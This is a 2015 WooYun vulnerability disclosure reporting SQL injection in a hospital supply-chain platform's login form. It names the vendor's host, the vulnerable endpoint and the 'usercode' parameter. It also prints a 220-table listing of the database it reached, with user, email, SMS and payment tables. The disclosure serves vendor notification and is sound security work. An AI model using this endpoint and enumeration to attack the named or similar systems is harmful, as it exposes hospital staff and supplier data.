当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131487

漏洞标题:图特医院物资供应链管理平台SQL注入(30库)

相关厂商:hspcn.net

漏洞作者: wps2015

提交时间:2015-08-04 11:46

修复时间:2015-09-18 12:06

公开时间:2015-09-18 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

还是小厂商?

详细说明:

问题出在http://hspcn.net:8000/home/Account/ 登录处

20.png


paylaod:

POST: hspcn.net:8000/home/Account/ValidateLogOn
data:usercode=fdsf&password=sfsd


参数usercode,共有30个库

21.png


当前库:HOPESHARE_S2YY

Database: HOPESHARE_S2YY
[220 tables]
+-----------------------------+
| BI_INDEX                    |
| CW_BMFL                     |
| HSP_SCM_DELIVERY_CHECK      |
| HSP_SCM_REPAIR              |
| OA_CMS_ARTICLE              |
| OA_CMS_ARTICLE2             |
| OA_CMS_ARTICLE_COMMENTS     |
| OA_CMS_ARTICLE_KEYWORD      |
| OA_CMS_ARTICLE_OTHER_COLUMN |
| OA_CMS_ARTICLE_PERMIT       |
| OA_CMS_ARTICLE_TOP          |
| OA_CMS_ARTICLE_VC           |
| OA_CMS_ARTICLE_VIEWER       |
| OA_CMS_ARTICLE_VIEWS        |
| OA_CMS_ARTICLE_VISITS       |
| OA_CMS_ARTICLE_VOTE         |
| OA_CMS_ARTICLE_VOTE_DETAIL  |
| OA_CMS_ARTICLE_VOTE_RESULT  |
| OA_CMS_COLUMN               |
| OA_CMS_COLUMN_PERMIT        |
| OA_CMS_VISITS               |
| OA_DEPARTMENT_PHONE         |
| OA_DIRECTORY                |
| OA_DOC_ATTACHMENT           |
| OA_EMAIL                    |
| OA_EMAIL_DETAIL             |
| OA_EMAIL_FOLDER             |
| OA_GUESTBOOK                |
| OA_GUESTBOOK2               |
| OA_LATEST_CONTACT           |
| OA_MESSAGE                  |
| OA_MESSAGE_DETAIL           |
| OA_SMS                      |
| OA_SMS_DETAIL               |
| OA_VEHICLE_INFO             |
| OA_VEHICLE_USE_LOCK         |
| OA_VEHICLE_USE_SITUATION    |
| PBCATCOL                    |
| PBCATEDT                    |
| PBCATFMT                    |
| PBCATTBL                    |
| PBCATVLD                    |
| PUB_ACCESS                  |
| PUB_ACCESS_CONTRAST         |
| PUB_ACCESS_PARM             |
| PUB_ACCESS_SQL              |
| PUB_ACCOUNTING_PERIOD       |
| PUB_APPLICATION             |
| PUB_ATTACHMENTS             |
| PUB_ATTACHMENTS_DEL         |
| PUB_BLOB                    |
| PUB_CNCHAR                  |
| PUB_CNPHRASE                |
| PUB_CODE                    |
| PUB_CODE_CLASS              |
| PUB_CODE_CLASS_CONTRAST     |
| PUB_CODE_CLASS_ITEM         |
| PUB_COLLECT                 |
| PUB_COLLECT_CONVERT         |
| PUB_COLLECT_FILTER          |
| PUB_COLLECT_PARM            |
| PUB_COL_SHOW                |
| PUB_COL_SOLUTION            |
| PUB_COL_SOLUTION_DETAIL     |
| PUB_CONTENT                 |
| PUB_CONTRAST_CLASS          |
| PUB_CONTRAST_RELATION       |
| PUB_DATE                    |
| PUB_DB_COL                  |
| PUB_DB_COL_EXTEND           |
| PUB_DB_CONNECT              |
| PUB_DB_INDEX                |
| PUB_DB_OBJ                  |
| PUB_DB_OBJECT               |
| PUB_DB_OBJECT_DEPEND        |
| PUB_DB_OBJECT_TYPE          |
| PUB_DB_OBJECT_TYPE_DEPEND   |
| PUB_DB_OBJ_DEPEND           |
| PUB_DB_SYNONYM              |
| PUB_DB_TAB                  |
| PUB_DB_TAB_RELATION         |
| PUB_DB_VIEW                 |
| PUB_DEPARTMENT              |
| PUB_DEPARTMENT_ZY           |
| PUB_DEPARTMENT_ZY1          |
| PUB_DEVICE                  |
| PUB_DEVICE_ASSIGN           |
| PUB_DEVICE_ASSIGN_PLAN      |
| PUB_DEVICE_CHECK_IN         |
| PUB_DICTIONARY              |
| PUB_DICTIONARY_AD           |
| PUB_DICTIONARY_ADBASE       |
| PUB_DICTIONARY_ITEM         |
| PUB_DICTIONARY_LZ           |
| PUB_EMPLOYEE                |
| PUB_EXCEL_IMPORT_DETAIL     |
| PUB_EXCEL_IMPORT_SOLUTION   |
| PUB_FP_SAMPLE               |
| PUB_FUNCTION                |
| PUB_FUNCTION_INTERFACE      |
| PUB_FUNCTION_OPERATION      |
| PUB_GROUP                   |
| PUB_GROUP_MEMBER            |
| PUB_GROUP_PERMIT            |
| PUB_HOSPITAL                |
| PUB_HOSPITAL_AREA           |
| PUB_IDICT                   |
| PUB_IDICT_ITEM              |
| PUB_INTERFACE_ICD10         |
| PUB_INTERFACE_SSMZK         |
| PUB_LOG_BIZ                 |
| PUB_LOG_BIZ_DEL             |
| PUB_LOG_ERROR               |
| PUB_LOG_LOGIN               |
| PUB_LOG_MENU                |
| PUB_LOG_MODIFY              |
| PUB_LOG_OPERATION           |
| PUB_LOG_SQL                 |
| PUB_LOG_SQL_HISTORY         |
| PUB_MENU                    |
| PUB_MENU_OPERATION          |
| PUB_OPERATION               |
| PUB_PACKAGE                 |
| PUB_PACKAGE_FUNCTION        |
| PUB_PACKAGE_REG             |
| PUB_PARM                    |
| PUB_PARM_FUNCTION           |
| PUB_PARM_INSTANCE           |
| PUB_PARM_OBJECT_SCOPE       |
| PUB_PARM_OBJECT_TYPE        |
| PUB_PARM_PACKAGE_ITEM       |
| PUB_PARM_PACKAGE_VAL        |
| PUB_PERMIT                  |
| PUB_PERMIT_DETAIL           |
| PUB_PERMIT_SOLUTION         |
| PUB_PERMIT_SOLUTION_FUNC    |
| PUB_PERMIT_SOLUTION_OBJECT  |
| PUB_PERMIT_SOLUTION_UNIT    |
| PUB_PERMIT_SOLUTION_UNIT_OP |
| PUB_REMIND                  |
| PUB_REMIND_CLASS            |
| PUB_REPERMIT                |
| PUB_REPERMIT_DETAIL         |
| PUB_REPORT                  |
| PUB_SEQUENCE                |
| PUB_SHARE_RECEIVE           |
| PUB_SHARE_SEND              |
| PUB_SUBSET                  |
| PUB_SUBSET_DETAIL           |
| PUB_SUBSET_GROUP            |
| PUB_SYSTEM                  |
| PUB_TASK                    |
| PUB_TASK_CLASS              |
| PUB_TASK_ITEM               |
| PUB_TASK_LOG                |
| PUB_TASK_LOGS               |
| PUB_TASK_PLAN               |
| PUB_TREE_DEF                |
| PUB_TREE_DEF_ITEM           |
| PUB_USER                    |
| PUB_USER_FAVORITE           |
| PUB_USER_PERMIT             |
| PUB_USER_REPERMIT           |
| PUB_WEBPART                 |
| SCM_ACCOUNT                 |
| SCM_ASK_BUDGET_PRODUCT      |
| SCM_ASK_PURCHASE_PRODUCT    |
| SCM_ASSETS                  |
| SCM_ASSETS_CHECK            |
| SCM_BILL_SIGN               |
| SCM_BILL_SIGNS              |
| SCM_BIZ                     |
| SCM_CERT                    |
| SCM_CERT_OLD_RELATION       |
| SCM_CERT_PRODUCT            |
| SCM_COMPANY                 |
| SCM_COMPANY_USER            |
| SCM_DELIVERY_CHECK          |
| SCM_FINANCE_BIZ             |
| SCM_FINANCE_PARMS           |
| SCM_HIS_MEDICAL_SH          |
| SCM_HIS_MEDICAL_SH_N        |
| SCM_INVOICE                 |
| SCM_INVOICE_BILLS           |
| SCM_PATROL                  |
| SCM_PATROLS                 |
| SCM_PAYMENT                 |
| SCM_PAYMENTS                |
| SCM_PAYMENTV_BQHZT          |
| SCM_PAYMENT_BALANCEP        |
| SCM_PORT_DEPT_ORDER         |
| SCM_PORT_ORDER_PACKAGE      |
| SCM_PORT_ORDER_PACKAGES     |
| SCM_POSITION                |
| SCM_PRODUCT_APPLY           |
| SCM_PRODUCT_APPLYP          |
| SCM_PRODUCT_APPLYS          |
| SCM_PRODUCT_AUTHO           |
| SCM_PRODUCT_CLASS           |
| SCM_PRODUCT_NAME            |
| SCM_PRODUCT_PRODUCE         |
| SCM_PRODUCT_SPEC            |
| SCM_PRODUCT_USE             |
| SCM_PRODUCT_USES            |
| SCM_PURCHASE                |
| SCM_PURCHASES               |
| SCM_PURCHASE_DELIVERYS      |
| SCM_REPAIR                  |
| SCM_REPAIR_EVALUATE         |
| SCM_REPAIR_PROESS           |
| SCM_REPAIR_STATE            |
| SCM_REQ_BUYS                |
| SCM_STOCK                   |
| SCM_STOCK_DEPT              |
| SCM_STOCK_IN                |
| SCM_STOCK_INS               |
| SCM_STORE                   |
| SCM_STORE_ACCOUNT           |
| SMS_ACCEPT                  |
| SMS_SEND                    |
+-----------------------------+


是可以dump数据库的

22.png


漏洞证明:

22.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-04 12:06

厂商回复:

跟之前其他白帽子提过的问题差不多,正在统一处理中。

最新状态:

暂无